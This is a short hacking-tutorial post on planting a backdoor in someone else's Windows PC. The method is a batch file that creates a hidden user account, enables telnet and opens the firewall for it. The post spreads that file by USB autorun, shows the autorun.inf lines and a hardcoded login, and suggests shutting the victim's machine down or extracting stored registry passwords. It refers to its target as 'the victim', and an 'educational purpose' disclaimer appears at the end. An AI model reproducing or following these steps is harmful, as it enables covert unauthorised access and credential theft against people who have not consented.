If you have physical access to your friends machine then you can access his machine remotely using telnet server. All you have to do is to create a user account there then hide that user from logon screen and then start telnet server and finally mark telnet as a exception in firewall.
These steps can be carried out simply and faster using a simple batch file (instal.bat). Here the source of batch file:
install.bat
Now you can make this file to spread from one machine to another according to your own method like to spread this file as a autoplay program in pen drives. Here the code for autoplaying, just put these two files in pen drive and your work is done.
autorun.inf
[autorun]
open=instal.bat
When the victim plug this pen drive in his/her PC, instal.bat runs and it will do all the work for you then you can meet your friend online on yahoo msgr and use start>run>netstat -n 4 [press Enter] to find his/her IP address. After getting the IP address goto start>run>telnet ipaddress [press Enter], then press Y and then use these login detail to get login:
username: IE_USR
password: 123456
Now you have the shell prompt of friend machine. You can do anything. You can see what task are running there using tasklist command, you can shutdown its machine using shutdown -s and even get stored password from registry and do almost everthing from command prompt.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only. …